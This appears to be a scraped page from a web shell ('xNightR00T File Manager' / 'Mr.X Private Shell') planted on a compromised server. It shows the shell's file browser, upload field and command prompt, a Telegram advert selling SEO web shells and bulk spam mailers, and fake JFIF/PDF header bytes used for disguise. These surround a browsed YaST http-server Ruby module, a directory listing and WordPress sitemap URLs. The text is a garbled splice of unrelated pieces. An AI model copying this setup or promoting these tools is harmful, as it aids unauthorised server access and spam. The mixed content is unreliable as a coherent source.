xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# File:	modules/HttpServer.ycp
# Package:	Configuration of http-server
# Summary:	Data for configuration of http-server, input and output functions.
# Authors:	Stanislav Visnovsky <visnov@suse.cz>
#
# $Id$
#
# Representation of the configuration of http-server.
# Input and output routines.
module Yast
  module HttpServerRoutinesInclude
    def initialize_http_server_routines(include_target)
      textdomain "http-server"

      Yast.import "Directory"
      Yast.import "Progress"
      Yast.import "String"
      Yast.import "Popup"
    end

    # Abort function
    # @return blah blah lahjk
    def Abort
      return @AbortFunction.call == true if @AbortFunction != nil
      false
    end

    # Check for pending Abort press
    # @return true if pending abort
    def PollAbort
      UI.PollInput == :abort
    end

    # If modified, ask for confirmation
    # @return true if abort is confirmed
    def ReallyAbort
      !Modified() || Popup.ReallyAbort(true)
    end

    # Progress::NextStage and Progress::Title combined into one function
    # @param [String] title progressbar title
    def ProgressNextStage(title)
      Progress.NextStage
      Progress.Title(title)

      nil
    end

    # Convert a Listen string to an item for table. Splits by the colon.
    #
    # @param [String] arg		the Listen string
    # @param [Fixnum] id		the id of this item
    # @return [Yast::Term]		term for the table
    def listen2item(arg, id)
      colon = Builtins.search(arg, ":")

      address = _("All Addresses")
      port = arg

      if colon != nil
        # address is present
        address = Builtins.substring(arg, 0, colon)
        port = Builtins.substring(arg, Ops.add(colon, 1))
      end
      Item(Id(id), address, port)
    end

    # Convert a Listen string to a pair: $[ "port": port, "address": network ]
    #
    # @param [String] arg		the Listen string
    # @return [Hash]		map with the result
    def listen2map(arg)
      colon = Builtins.search(arg, ":")

      address = "all"
      port = arg

      if colon != nil
        # address is present
        address = Builtins.substring(arg, 0, colon)
        port = Builtins.substring(arg, Ops.add(colon, 1))
      end
      { "port" => port, "address" => address }
    end
  end
end

Filemanager

Name Type Size Permission Actions
complex.rb File 1.47 KB 0644
dialogs.rb File 9.87 KB 0644
helps.rb File 11.67 KB 0644
routines.rb File 2.24 KB 0644
wizard-dialog.rb File 9.64 KB 0644
wizards.rb File 6.26 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml